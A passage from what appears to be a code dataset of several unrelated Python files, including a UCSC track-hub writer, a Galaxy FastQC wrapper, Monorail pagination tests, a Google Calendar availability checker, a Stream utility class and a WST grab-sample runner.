        ("snake", "Alignment Snakes", 3, 0),
    ]
    groups += [("annotation%s" % a, "%s Annotations" % a.capitalize(), 3, 1)
               for a in annotations]
    groups.append(("exp", "Experimental", 4, 1))
    # `with` closes the handle even if a write raises.
    with open(filename, 'w') as f:
        for name, label, priority, closed in groups:
            f.write("name %s\n" % name)
            f.write("label %s\n" % label)
            f.write("priority %d\n" % priority)
            f.write("defaultIsClosed %d\n" % closed)
            f.write("\n")
def writeHubFile(outdir, options):
    """Write <outdir>/hub.txt, the top-level UCSC track-hub stanza.

    Reads hubLabel/shortLabel/longLabel/email from `options`; uses a `with`
    block so the handle is closed even if a write raises.
    """
    hubfile = os.path.join(outdir, "hub.txt")
    with open(hubfile, "w") as f:
        f.write("hub %s\n" %options.hubLabel)
        f.write("shortLabel %s\n" %options.shortLabel)
        f.write("longLabel %s\n" %options.longLabel)
        f.write("genomesFile genomes.txt\n")
        f.write("email %s\n" %options.email)
#=========== READ FILES ===========
def readList(file):
    """Read a text file and return its lines as a list of stripped strings.

    Empty lines are kept (as empty strings), matching the previous behavior.
    """
    with open(file, 'r') as f:
        return [line.strip() for line in f]
def readRename(file):
    """Parse a tab-separated rename file: <halGenomeName>\\t<displayName>.

    Blank lines and lines starting with '#' are skipped; lines with fewer
    than two tab-separated fields are ignored. Returns a dict mapping the
    hal genome name to its display name.
    """
    name2new = {}
    with open(file, 'r') as f:
        for line in f:
            line = line.strip()
            if len(line) == 0 or line[0] == "#":
                continue
            items = line.split('\t')
            if len(items) >= 2:
                # Extra fields beyond the second are deliberately ignored.
                name2new[items[0]] = items[1]
    return name2new
#=========== OPTIONS =============
def addHubOptions(parser):
    """Register the 'HUB INFORMATION' optparse option group on `parser`."""
    group = OptionGroup(parser, "HUB INFORMATION")
    group.add_option('--hub', dest='hubLabel', default='myHub', help='a single-word name of the directory containing the track hub files. Not displayed to hub users. Default=%default')
    group.add_option('--shortLabel', dest='shortLabel', default='my hub', help='the short name for the track hub. Suggested maximum length is 17 characters. Displayed as the hub name on the Track Hubs page and the track group name on the browser tracks page. Default=%default')
    group.add_option('--longLabel', dest='longLabel', default='my hub', help='a longer descriptive label for the track hub. Suggested maximum length is 80 characters. Displayed in the description field on the Track Hubs page. Default=%default')
    group.add_option('--email', dest='email', default='NoEmail', help='the contact to whom questions regarding the track hub should be directed. Default=%default')
    group.add_option('--genomes', dest='genomes', help='File specified list of genomes to make browser for. If specified, only create browsers for these genomes in the order provided by the list. Otherwise create browsers for all genomes in the input hal file')
    group.add_option('--rename', dest='rename', help='File that maps halfile genomeNames to names displayed on the browser. Format: <halGenomeName>\\t<genomeNameToDisplayOnBrowser>. Default=%default')
    group.add_option('--tree', dest='treeFile', help='Newick binary tree. The order of the tracks and the default track layout will be based on this tree if option "genomes" is not specified. If not specified, try to extract the newick tree from the input halfile.')
    group.add_option('--url', dest='url', help='Public url of the hub location')
    group.add_option('--twobitdir', dest='twobitdir', help='Optional. Directory containing the 2bit files of each genomes. Default: extract from the input hal file.')
    parser.add_option_group(group)
def checkHubOptions(parser, options):
    """Post-process and validate hub options in place.

    Resolves the genome list (file path -> list of names), the display-name
    map, and optionally the binary newick tree; calls parser.error() when the
    given tree file does not exist.
    """
    if options.genomes:
        # Replace the file path with the list of genome names it contains.
        options.genomes = readList(options.genomes)
    options.properName = {}
    if options.rename and os.path.exists(options.rename):
        options.properName = readRename(options.rename)
    options.treeFig = None
    options.leaves = None
    options.tree = None
    if options.treeFile and not os.path.exists(options.treeFile):
        # BUG FIX: the original interpolated options.tree (always None at this
        # point) into the message; report the actual missing path instead.
        parser.error("The tree file %s does not exist.\n" %options.treeFile)
    elif options.treeFile:
        tree = Phylo.read(options.treeFile, 'newick')
        if isBinaryTree(tree):
            options.tree = tree
        else:
            # Non-binary trees are ignored with a warning ("Warnning" typo fixed).
            sys.stderr.write("Warning: tree %s is not a binary tree. Will be ignored!" %options.treeFile)
| 7,400 | 2,547 |
"""The core elements of sqlfluff."""
# flake8: noqa: F401
# Config objects
from sqlfluff.core.config import FluffConfig
# Public classes
from sqlfluff.core.linter import Linter
from sqlfluff.core.parser import Lexer, Parser
# Dialect introspection
from sqlfluff.core.dialects import dialect_selector, dialect_readout
# All of the errors.
from sqlfluff.core.errors import (
SQLBaseError,
SQLTemplaterError,
SQLLexError,
SQLParseError,
SQLLintError,
)
| 475 | 161 |
"""
Rewrite of rgFastQC.py for Version 0.11.2 of FastQC.
Changes implemented from tmcgowan at
https://testtoolshed.g2.bx.psu.edu/view/tmcgowan/fastqc
and iuc at https://toolshed.g2.bx.psu.edu/view/iuc/fastqc
with minor changes and bug fixes
SYNOPSIS
rgFastQC.py -i input_file -j input_file.name -o output_html_file [-d output_directory]
[-f fastq|bam|sam] [-n job_name] [-c contaminant_file] [-e fastqc_executable]
EXAMPLE (generated by Galaxy)
rgFastQC.py -i path/dataset_1.dat -j 1000gsample.fastq -o path/dataset_3.dat -d path/job_working_directory/subfolder
-f fastq -n FastQC -c path/dataset_2.dat -e fastqc
"""
import bz2
import glob
import gzip
import mimetypes
import optparse
import os
import re
import shutil
import subprocess
import tempfile
import zipfile
class FastQCRunner(object):
    """Drive a FastQC run from Galaxy: build the command line, execute FastQC
    and copy the html/text reports back into the Galaxy output datasets."""

    def __init__(self, opts=None):
        '''
        Initializes an object to run FastQC in Galaxy. To start the process, use the function run_fastqc()
        '''
        # Check whether the options are specified and saves them into the object
        assert opts is not None
        self.opts = opts

    def prepare_command_line(self):
        '''
        Develops the Commandline to run FastQC in Galaxy
        '''
        # Check whether a given file compression format is valid
        # This prevents uncompression of already uncompressed files
        infname = self.opts.inputfilename
        linf = infname.lower()
        informat = self.opts.informat
        trimext = False
        # decompression at upload currently does NOT remove this now bogus ending - fastqc will barf
        # patched may 29 2013 until this is fixed properly
        ftype = mimetypes.guess_type(self.opts.input)
        if linf.endswith('.gz') or linf.endswith('.gzip') or ftype[-1] == "gzip" or informat.endswith('.gz'):
            f = gzip.open(self.opts.input)
            try:
                f.readline()
                ftype = ['gzip']
            except Exception:
                # Not actually gzip data: drop the bogus extension below.
                trimext = True
            f.close()
        elif linf.endswith('bz2') or informat.endswith('.bz2'):
            f = bz2.BZ2File(self.opts.input, 'r')
            try:
                ftype = ['bzip2']
                f.readline()
            except Exception:
                trimext = True
            f.close()
        elif linf.endswith('.zip'):
            if not zipfile.is_zipfile(self.opts.input):
                trimext = True
        if trimext:
            # Verify the file is at least readable before renaming it.
            # (with-statement fixes the handle leak in the original)
            with open(self.opts.input) as f:
                try:
                    f.readline()
                except Exception:
                    raise Exception("Input file corruption, could not identify the filetype")
            infname = os.path.splitext(infname)[0]
        # Replace unwanted or problematic charaters in the input file name
        self.fastqinfilename = re.sub(r'[^a-zA-Z0-9_\-\.]', '_', os.path.basename(infname))
        # check that the symbolic link gets a proper ending, fastqc seems to ignore the given format otherwise
        if 'fastq' in self.opts.informat:
            # with fastq the .ext is ignored, but when a format is actually passed it must comply with fastqc's
            # accepted formats..
            self.opts.informat = 'fastq'
        elif not self.fastqinfilename.endswith(self.opts.informat):
            self.fastqinfilename += '.%s' % self.opts.informat
        # Build the Commandline from the given parameters
        # BUG FIX: the original read the module-level global `opts` here, which
        # only exists when this file runs as a script; use self.opts instead.
        command_line = [self.opts.executable, '--outdir %s' % self.opts.outputdir]
        if self.opts.contaminants is not None:
            command_line.append('--contaminants %s' % self.opts.contaminants)
        if self.opts.limits is not None:
            command_line.append('--limits %s' % self.opts.limits)
        command_line.append('--quiet')
        command_line.append('--extract')  # to access the output text file
        if ftype[-1] == 'gzip':
            self.fastqinfilename += '.gz'
        elif ftype[-1] == 'bzip2':
            self.fastqinfilename += '.bz2'
        else:
            command_line.append('-f %s' % self.opts.informat)
        command_line.append(self.fastqinfilename)
        self.command_line = ' '.join(command_line)

    def copy_output_file_to_dataset(self):
        '''
        Retrieves the output html and text files from the output directory and copies them to the Galaxy output files
        '''
        # retrieve html file
        result_file = glob.glob(self.opts.outputdir + '/*html')
        with open(result_file[0], 'rb') as fsrc:
            with open(self.opts.htmloutput, 'wb') as fdest:
                shutil.copyfileobj(fsrc, fdest)
        # retrieve text file
        text_file = glob.glob(self.opts.outputdir + '/*/fastqc_data.txt')
        with open(text_file[0], 'rb') as fsrc:
            with open(self.opts.textoutput, 'wb') as fdest:
                shutil.copyfileobj(fsrc, fdest)

    def run_fastqc(self):
        '''
        Executes FastQC. Make sure the mandatory import parameters input, inputfilename, outputdir and htmloutput have been specified in the options
        '''
        # Create a log file
        dummy, tlog = tempfile.mkstemp(prefix='rgFastQC', suffix=".log", dir=self.opts.outputdir)
        sout = open(tlog, 'w')
        self.prepare_command_line()
        sout.write(self.command_line)
        sout.write('\n')
        sout.write("Creating symlink\n")  # between the input (.dat) file and the given input file name
        os.symlink(self.opts.input, self.fastqinfilename)
        sout.write("check_call\n")
        # NOTE(review): shell=True with an interpolated command string; the
        # pieces come from Galaxy-controlled options, but a list-based
        # subprocess.run([...]) call would be safer.
        subprocess.check_call(self.command_line, shell=True)
        sout.write("Copying working %s file to %s \n" % (self.fastqinfilename, self.opts.htmloutput))
        self.copy_output_file_to_dataset()
        sout.write("Finished")
        sout.close()
# Script entry point: parse Galaxy's command-line arguments and run FastQC.
if __name__ == '__main__':
    op = optparse.OptionParser()
    op.add_option('-i', '--input', default=None)
    op.add_option('-j', '--inputfilename', default=None)
    op.add_option('-o', '--htmloutput', default=None)
    op.add_option('-t', '--textoutput', default=None)
    op.add_option('-d', '--outputdir', default="/tmp/shortread")
    op.add_option('-f', '--informat', default='fastq')
    op.add_option('-n', '--namejob', default='rgFastQC')
    op.add_option('-c', '--contaminants', default=None)
    op.add_option('-l', '--limits', default=None)
    op.add_option('-e', '--executable', default='fastqc')
    opts, args = op.parse_args()
    # These three are mandatory; everything else has a usable default.
    assert opts.input is not None
    assert opts.inputfilename is not None
    assert opts.htmloutput is not None
    if not os.path.exists(opts.outputdir):
        os.makedirs(opts.outputdir)
    fastqc_runner = FastQCRunner(opts)
    fastqc_runner.run_fastqc()
| 6,698 | 2,107 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Unit tests for pagination classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from google.appengine.ext import testbed
from framework import exceptions
from framework import paginate
from testing import testing_helpers
from proto import secrets_pb2
class PageTokenTest(unittest.TestCase):
    """Tests for generating and validating opaque pagination page tokens."""

    def setUp(self):
        # App Engine service stubs required by the token code under test.
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        self.testbed.init_memcache_stub()
        self.testbed.init_datastore_v3_stub()

    def testGeneratePageToken_DiffRequests(self):
        # Same start offset but different request contents must produce
        # different tokens (tokens are bound to the request they paginate).
        request_cont_1 = secrets_pb2.ListRequestContents(
            parent='same', page_size=1, order_by='same', query='same')
        request_cont_2 = secrets_pb2.ListRequestContents(
            parent='same', page_size=2, order_by='same', query='same')
        start = 10
        self.assertNotEqual(
            paginate.GeneratePageToken(request_cont_1, start),
            paginate.GeneratePageToken(request_cont_2, start))

    def testValidateAndParsePageToken(self):
        # Round-trip: parsing a token with the same request returns the start.
        request_cont_1 = secrets_pb2.ListRequestContents(
            parent='projects/chicken', page_size=1, order_by='boks', query='hay')
        start = 2
        token = paginate.GeneratePageToken(request_cont_1, start)
        self.assertEqual(
            start,
            paginate.ValidateAndParsePageToken(token, request_cont_1))

    def testValidateAndParsePageToken_InvalidContents(self):
        # A token presented with a different request must be rejected.
        request_cont_1 = secrets_pb2.ListRequestContents(
            parent='projects/chicken', page_size=1, order_by='boks', query='hay')
        start = 2
        token = paginate.GeneratePageToken(request_cont_1, start)
        request_cont_diff = secrets_pb2.ListRequestContents(
            parent='projects/goose', page_size=1, order_by='boks', query='hay')
        with self.assertRaises(exceptions.PageTokenException):
            paginate.ValidateAndParsePageToken(token, request_cont_diff)

    def testValidateAndParsePageToken_InvalidSerializedToken(self):
        # Garbage that never came from GeneratePageToken.
        request_cont = secrets_pb2.ListRequestContents()
        with self.assertRaises(exceptions.PageTokenException):
            paginate.ValidateAndParsePageToken('sldkfj87', request_cont)

    def testValidateAndParsePageToken_InvalidTokenFormat(self):
        # Structurally malformed token.
        request_cont = secrets_pb2.ListRequestContents()
        with self.assertRaises(exceptions.PageTokenException):
            paginate.ValidateAndParsePageToken('///sldkfj87', request_cont)
class PaginateTest(unittest.TestCase):
    """Tests for VirtualPagination's num/start/last arithmetic and urls.

    NOTE(review): most `mr` assignments below are unused by the assertions
    that follow them -- likely leftovers from an earlier API.
    """

    def testVirtualPagination(self):
        # Paginating 0 results on a page that can hold 100.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
        total_count = 0
        items_per_page = 100
        start = 0
        vp = paginate.VirtualPagination(total_count, items_per_page, start)
        self.assertEqual(vp.num, 100)
        self.assertEqual(vp.start, 1)
        self.assertEqual(vp.last, 0)
        self.assertFalse(vp.visible)
        # Paginating 12 results on a page that can hold 100.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
        vp = paginate.VirtualPagination(12, 100, 0)
        self.assertEqual(vp.num, 100)
        self.assertEqual(vp.start, 1)
        self.assertEqual(vp.last, 12)
        self.assertTrue(vp.visible)
        # Paginating 12 results on a page that can hold 10.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=10')
        vp = paginate.VirtualPagination(12, 10, 0)
        self.assertEqual(vp.num, 10)
        self.assertEqual(vp.start, 1)
        self.assertEqual(vp.last, 10)
        self.assertTrue(vp.visible)
        # Paginating 12 results starting at 5 on page that can hold 10.
        mr = testing_helpers.MakeMonorailRequest(
            path='/issues/list?start=5&num=10')
        vp = paginate.VirtualPagination(12, 10, 5)
        self.assertEqual(vp.num, 10)
        self.assertEqual(vp.start, 6)
        self.assertEqual(vp.last, 12)
        self.assertTrue(vp.visible)
        # Paginating 123 results on a page that can hold 100.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
        vp = paginate.VirtualPagination(123, 100, 0)
        self.assertEqual(vp.num, 100)
        self.assertEqual(vp.start, 1)
        self.assertEqual(vp.last, 100)
        self.assertTrue(vp.visible)
        # Paginating 123 results on second page that can hold 100.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list?start=100')
        vp = paginate.VirtualPagination(123, 100, 100)
        self.assertEqual(vp.num, 100)
        self.assertEqual(vp.start, 101)
        self.assertEqual(vp.last, 123)
        self.assertTrue(vp.visible)
        # Paginating a huge number of objects will show at most 1000 per page.
        mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=9999')
        vp = paginate.VirtualPagination(12345, 9999, 0)
        self.assertEqual(vp.num, 1000)
        self.assertEqual(vp.start, 1)
        self.assertEqual(vp.last, 1000)
        self.assertTrue(vp.visible)
        # Test urls for a hotlist pagination
        mr = testing_helpers.MakeMonorailRequest(
            path='/u/hotlists/17?num=5&start=4')
        mr.hotlist_id = 17
        mr.auth.user_id = 112
        vp = paginate.VirtualPagination(12, 5, 4,
                                        list_page_url='/u/112/hotlists/17')
        self.assertEqual(vp.num, 5)
        self.assertEqual(vp.start, 5)
        self.assertEqual(vp.last, 9)
        self.assertTrue(vp.visible)
        self.assertEqual('/u/112/hotlists/17?num=5&start=9', vp.next_url)
        self.assertEqual('/u/112/hotlists/17?num=5&start=0', vp.prev_url)
| 5,563 | 2,070 |
################################################################################
"""
DJ JOE Website Availability Calendar
------------------------------------
(c) 2021 - Stanley Solutions - Joe Stanley
This application serves the React frontend required to demonstrate the available
dates for DJ Joe Services.
"""
################################################################################
# Import Requisites
import os
import datetime
import requests
from date_support import daterange, _clean_dates, _restore_datetimes
ENV_API_KEY = "GOOGLE_API_KEY"
BASE_URL = (
"https://clients6.google.com/calendar/v3/calendars/engineerjoe440@gmail.com"
"/events?calendarId=engineerjoe440%40gmail.com&singleEvents=true&timeZone="
"America%2FLos_Angeles&maxAttendees=1&maxResults=250&sanitizeHtml=true&"
"timeMin={TIME_MIN}&timeMax={TIME_MAX}&key={API_KEY}"
)
################################################################################
# Supporting Functions
def googlify_datetimes(dts):
    """Format each datetime as an ISO-8601 string with a trailing "Z"
    (the form the Google Calendar API expects)."""
    normalized = _restore_datetimes(_clean_dates(dts))
    stamps = []
    for moment in normalized:
        stamps.append(moment.isoformat() + "Z")
    return stamps
def get_google_date(google_dt_dict):
    """Performs dictionary-specific handling to attempt extraction of dt.

    Prefers the 'dateTime' key (timed events) and falls back to 'date'
    (all-day events); returns only the YYYY-MM-DD portion.
    """
    stamp = google_dt_dict.get('dateTime', google_dt_dict.get('date'))
    date_part, _, _ = stamp.partition("T")
    return date_part
def get_google_time(google_dt_dict):
    """Performs dictionary-specific handling to attempt extraction of dt.

    Returns the HH:MM:SS portion of the event timestamp, or "00:00:00" for
    date-only (all-day) entries. Fix: the original only stripped a negative
    UTC offset ("-07:00"); positive offsets ("+02:00") and the "Z" suffix
    were left attached, which breaks downstream strptime("%H:%M:%S") parsing.
    """
    google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date'))
    try:
        timestring = google_dt.split("T")[1]
    except IndexError:
        # Date-only values have no "T" separator -> treat as midnight.
        return "00:00:00"
    # Strip any UTC-offset suffix: "-07:00", "+02:00", or a bare "Z".
    timestring = timestring.split('-')[0].split('+')[0].rstrip('Z')
    return timestring
################################################################################
# Event Listing Functions
def get_event_list(start: datetime.datetime, end: datetime.datetime):
    """Identifies a list of all events in the specified date range.

    Returns the raw Google Calendar event dicts, or [] when the request
    fails. Fix: the original printed the fully-formatted request URL, which
    embeds the API key read from the environment -- a secret leak into logs.
    """
    start, end = googlify_datetimes([start, end])
    # Call the Calendar API
    req_url = BASE_URL.format(
        TIME_MIN=start,
        TIME_MAX=end,
        API_KEY=os.getenv(ENV_API_KEY),
    )
    # NOTE: never log req_url -- it contains the API key.
    resp = requests.get(req_url)
    if resp.status_code == 200:
        return resp.json().get('items', [])
    print(
        "GOOGLE REQUEST FAILED:",
        resp.status_code,
        resp.reason,
    )
    return []
def get_occupied_dates(start: datetime.datetime, end: datetime.datetime):
    """Generates a list of single dt objects representing occupied dates.

    Single-day events (or events ending exactly at midnight) contribute only
    their start date; longer events contribute every date in their range.
    Fixes: `is not None` identity checks, and the event's end dict no longer
    shadows the `end` parameter.
    """
    events = get_event_list(start=start, end=end)
    occupied_dates = []
    # Iteratively process each event
    for event in events:
        start_date = datetime.datetime.strptime(
            get_google_date(event['start']),
            "%Y-%m-%d",
        )
        event_end = event.get('end')
        if event_end is not None:
            end_date = get_google_date(event_end)
            end_time = datetime.datetime.strptime(
                get_google_time(event_end), "%H:%M:%S"
            )
            # Expand multi-day events only when they do not terminate exactly
            # at midnight (midnight ends mark all-day/date-only boundaries).
            if end_date is not None and end_time.hour != 0:
                end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d")
                for date in daterange(start_date, end_date):
                    # Append all dates in range
                    occupied_dates.append(date)
            else:
                # Append only start date
                occupied_dates.append(start_date)
        else:
            # Append only start date
            occupied_dates.append(start_date)
    return occupied_dates
if __name__ == '__main__':
    # Smoke test: query a 30-day window starting 20 days in the past.
    now = datetime.datetime.now() - datetime.timedelta(days=20)
    events = get_event_list(now, now + datetime.timedelta(days=30))
    for event in events:
        # Timed events carry 'dateTime'; all-day events carry only 'date'.
        print(event['start'].get('dateTime', event['start'].get('date')))
    if len(events) == 0:
        print("NO EVENTS FOUND")
    events = get_occupied_dates(now, now + datetime.timedelta(days=30))
    for event in events:
        print("event", event)
    if len(events) == 0:
        print("NO EVENTS FOUND")
from pathlib import Path
import numpy as np
import random
import subprocess
from typing import *
from .IOUtils import IOUtils
class Stream:
    """
    Streams help manipulate sequences of objects.

    A minimal, Java-Stream-flavoured wrapper around a plain list offering
    chainable filter/map/sorted/split/shuffle operations.
    """
    def __init__(self):
        # Backing list that holds the stream's elements.
        self.items = list()
        return
    @classmethod
    def of(cls, one_or_more_items):
        """
        Get a new stream from the item / items.
        :param one_or_more_items: is converted to list with builtin `list` function.
        """
        stream = Stream()
        if one_or_more_items is not None:
            stream.items = list(one_or_more_items)
        # end if, if
        return stream
    @classmethod
    def of_files(cls, dir_path: Union[str, Path]):
        """
        Get a stream of the files under the directory (non-recursive, sorted).
        """
        with IOUtils.cd(dir_path):
            cmd_find = "find -mindepth 1 -maxdepth 1 -type f"
            files = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1]
        # end with
        # Drop the leading "./" that `find` prefixes to each entry.
        files = [file[2:] for file in files]
        stream = cls.of(files)
        stream.sorted()
        return stream
    @classmethod
    def of_dirs(cls, dir_path: Union[str, Path]):
        """
        Get a stream of the sub-directories under the directory (non-recursive, sorted).
        """
        with IOUtils.cd(dir_path):
            cmd_find = "find -mindepth 1 -maxdepth 1 -type d"
            dirs = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1]
        # end with
        # Drop the leading "./" that `find` prefixes to each entry.
        dirs = [dir[2:] for dir in dirs]
        stream = cls.of(dirs)
        stream.sorted()
        return stream
    def filter(self, predicate_func: Callable[[object], bool]):
        """
        Returns a stream consisting of the elements of this stream that match the given predicate.
        """
        return Stream.of(item for item in self.items if predicate_func(item))
    def count(self):
        # NOTE(review): this sums the elements themselves, which only works
        # for numeric streams; an element count would be len(self) -- confirm
        # intent (reduce() with its default already returns the element count).
        return sum(self.items)
    def reduce(self, count_func: Callable[[str], float] = lambda x: 1):
        # Sum of count_func over all items; the default counts one per item.
        return sum([count_func(f) for f in self.items])
    def sorted(self, key: Callable[[str], object] = lambda f: f,
               reverse: bool = False):
        """
        Sorts the list of files in the dataset (in place); returns self for chaining.
        """
        list.sort(self.items, key=key, reverse=reverse)
        return self
    def map(self, map_func: Callable[[str], object],
            errors: str = "raise", default: object = ""):
        """
        Lazily applies map_func to each item. With errors="ignore" a failing
        item yields `default` instead of raising.
        """
        def new_items_generator():
            for item in self.items:
                try:
                    new_item = map_func(item)
                except:
                    if errors == "ignore":
                        yield default
                    else:
                        raise
                else:
                    yield new_item
            # end for
        # end def
        return Stream.of(new_items_generator())
    def peak(self, peak_func: Callable[[str], None],
             errors: str = "ignore"):
        # Applies peak_func to each item for its side effect (Java streams'
        # "peek"); exceptions are swallowed by default. Returns self.
        for item in self.items:
            try:
                peak_func(item)
            except:
                if errors == "ignore":
                    continue
                else:
                    raise
        # end for
        return self
    def split(self, fraction_list: List[float],
              count_func: Callable[[str], float] = lambda x: 1):
        """
        Splits the dataset as each part specified by the fractions (assumed to sum up to 1).
        Splitting is done by finding the cutting points. If randomization is needed, call shuffle first.
        :param count_func: customize the number of data counts in each file.
        """
        if self.is_empty():
            return tuple(Stream() for i in range(len(fraction_list)))
        # Per-item weights, running totals, and the target cut weights.
        count_list = [count_func(f) for f in self.items]
        cum_count_list = np.cumsum(count_list)
        cum_expected_count_list = [f * cum_count_list[-1] for f in np.cumsum(fraction_list)]
        cut_index_list = []
        last_i = 0
        for i, cum_count in enumerate(cum_count_list):
            # Cut as soon as the running weight reaches the next target.
            if cum_count >= cum_expected_count_list[len(cut_index_list)]:
                last_i = i+1
                cut_index_list.append(i+1)
                if len(cut_index_list) >= len(cum_expected_count_list):
                    break
            # end if
        # end for if
        # Make sure the final part also covers any remaining tail items.
        if last_i != len(cum_count_list):
            cut_index_list.append(len(cum_count_list))
        # end if
        cut_index_list.insert(0,0)
        return tuple(Stream.of(self.items[cut_index_list[i]:cut_index_list[i + 1]]) for i in range(len(cut_index_list) - 1))
    def shuffle(self, seed=None):
        """
        Shuffles the list of files in the dataset (in place); returns self.
        """
        random.seed(seed)
        random.shuffle(self.items)
        return self
    def get(self, index: int):
        # Element at position `index`.
        return self.items[index]
    def is_empty(self):
        return len(self.items) == 0
    def __getitem__(self, item):
        # Slices return a sub-stream; a single index returns a 1-item stream.
        new_items = self.items.__getitem__(item)
        if not isinstance(item, slice):
            new_items = [new_items]
        return Stream.of(new_items)
    def __setitem__(self, key, value):
        return self.items.__setitem__(key, value)
    def __delitem__(self, key):
        return self.items.__delitem__(key)
    def __iter__(self):
        return self.items.__iter__()
    def __len__(self):
        return self.items.__len__()
    def __str__(self):
        return "Stream with {} items".format(len(self.items))
    def __repr__(self):
        return self.__str__()
    def __add__(self, other):
        # NOTE(review): raising NotImplementedError (an exception) instead of
        # returning the NotImplemented sentinel disables Python's
        # reflected-operand fallback -- confirm this is intended.
        if isinstance(other, Stream):
            return Stream.of(self.items+other.items)
        else:
            raise NotImplementedError
| 5,764 | 1,699 |
# Copyright (2013) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government
# retains certain rights in this software.
#
# This software is released under the FreeBSD license as described
# in License.txt
import time
import string
import subprocess
import os
import tempfile
from multiprocessing import Process
import _gui
from _gui import FakeFile
import json # Python 2.6 or later
def createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix):
    """Write the WST 'grabsample' YAML configuration to a temp .yml file.

    References all the other temp input files by name. dSampleTime appears
    to be in seconds (it is divided by 60 and labelled minutes) -- TODO
    confirm; under Python 2 that division truncates. Returns the still-open
    NamedTemporaryFile.
    """
    file = tempfile.NamedTemporaryFile(delete=False, suffix='.yml')
    _gui.writeLine(file,"# written using dinesti web gui")
    _gui.writeLine(file,"")
    _gui.writeLine(file,"network:")
    _gui.writeLine(file,"  epanet file: " + fINP.name)
    #_gui.writeLine(file,"  wqm file: " + fWQM.name) # moved to grabsample section
    #_gui.writeLine(file,"  hydraulic timestep: None") # no longer available
    _gui.writeLine(file,"  water quality timestep: None")
    _gui.writeLine(file,"  simulation duration: None")
    _gui.writeLine(file,"")
    _gui.writeLine(file,"scenario:") # used to be called 'events'
    _gui.writeLine(file,"  scn file: " + fSCN.name) # for _inversion LP (optimization)
    _gui.writeLine(file,"  tsg file: " + fTSG.name) # for _inversion STEP (optmization)
    _gui.writeLine(file,"  ignore merlion warnings: False") # moved from network section
    _gui.writeLine(file,"")
    #_gui.writeLine(file,"solver:")
    #_gui.writeLine(file,"  cplex:")
    #_gui.writeLine(file,"    mipgap: 0.02")
    #_gui.writeLine(file,"    threads: 1")
    _gui.writeLine(file,"")
    #_gui.writeLine(file,"samplelocation:")
    _gui.writeLine(file,"grabsample:")
    _gui.writeLine(file,"  wqm file: " + fWQM.name) # moved from network section
    _gui.writeLine(file,"  model format: PYOMO") # AMPL or PYOMO
    _gui.writeLine(file,"  sample time: " + str(dSampleTime / 60)) # minutes
    _gui.writeLine(file,"  threshold: 0.01") # default = 0.001
    _gui.writeLine(file,"  fixed sensor file: " + fSEN.name)
    #_gui.writeLine(file,"  not allowed locations file: None") # no longer available
    _gui.writeLine(file,"  allowed locations file: " + fNodes.name) # TODO
    _gui.writeLine(file,"  N samples: " + str(nSampleCount)) # default = 3
    _gui.writeLine(file,"  greedy selection: True")
    _gui.writeLine(file,"")
    _gui.writeLine(file,"configure:")
    _gui.writeLine(file,"  ampl executable: ampl")#" + sInstallDir + "bin/ampl")
    _gui.writeLine(file,"  pyomo executable: pyomo")#" + sInstallDir + "bin/pyomo")
    _gui.writeLine(file,"  output prefix: " + sOutputPrefix)
    _gui.writeLine(file,"")
    #_gui.writeLine(file,"internal:")
    #_gui.writeLine(file,"  nodeNames: None")
    #_gui.writeLine(file,"  nodeIndices: None")
    return file
def createInpFile(data):
    """Persist the document's EPANET .inp contents to a temp file and return it."""
    inp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.inp')
    inp_file.write(_gui.getFile(data["docId"], data["fileName"]))
    return inp_file
def createScnFile(uuid):
    """Return a placeholder file object; no real .scn file is generated."""
    return FakeFile()
def createTsgFile(uuid):
    """Concatenate every scenario file for this doc into a temp .tsg file.

    Each scenario's contents are written newline-terminated; returns the
    still-open NamedTemporaryFile.
    """
    temp = tempfile.NamedTemporaryFile(delete=False, suffix='.tsg')
    data = _gui.getView("m_ScenariosList?key=\"" + uuid + "\"")
    for row in data["rows"]:
        text = _gui.getFile(row["id"], row["value"]["fileName"])
        temp.write(text + "\n")
    return temp
def createSenFile(uuid):
    """Write the document's non-blank sensor lines, newline-separated (no
    trailing newline), to a temp .sen file and return it."""
    temp = tempfile.NamedTemporaryFile(delete=False, suffix='.sen')
    doc = _gui.getDoc(uuid)
    raw = _gui.getValue(doc, "sensors", "")
    entries = []
    for line in raw.split("\n"):
        stripped = line.strip()
        if len(stripped) > 0:
            entries.append(stripped)
    temp.write("\n".join(entries))
    return temp
def createNodesFile(Nodes):
    """Dump the allowed node names, one newline-terminated name per line,
    to a temp .nodes file and return it."""
    temp = tempfile.NamedTemporaryFile(delete=False, suffix='.nodes')
    for entry in Nodes:
        temp.write("%s\n" % entry)
    return temp
def runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix):
    """Run the WST 'grabsample' tool and record results/status on the doc.

    Fixes: replaces the `<>` operator (removed in Python 3) with `!=`/`is`
    comparisons and the deprecated `string.find` module function with the
    `str.find` method; both forms behave identically under Python 2.
    """
    nStart = time.time()
    sInstallDir = _gui.getInstallDir()
    args = [sInstallDir + "python/bin/wst", "grabsample", fYML.name]
    #
    p = subprocess.Popen(args, stdout=subprocess.PIPE)
    doc = _gui.getDoc(sUuid)
    sampleTime = doc.get("sampleTime")
    inp_info = doc.get("docFile_INP")
    duration = inp_info.get("duration")
    bErrorOverTime = False
    # Flag (but do not abort) a sample time past the simulation's end.
    if sampleTime is not None and duration is not None:
        if sampleTime > duration:
            bErrorOverTime = True
    doc["pid"] = str(p.pid)
    doc["status"] = "Running"
    res = _gui.setDoc(doc)
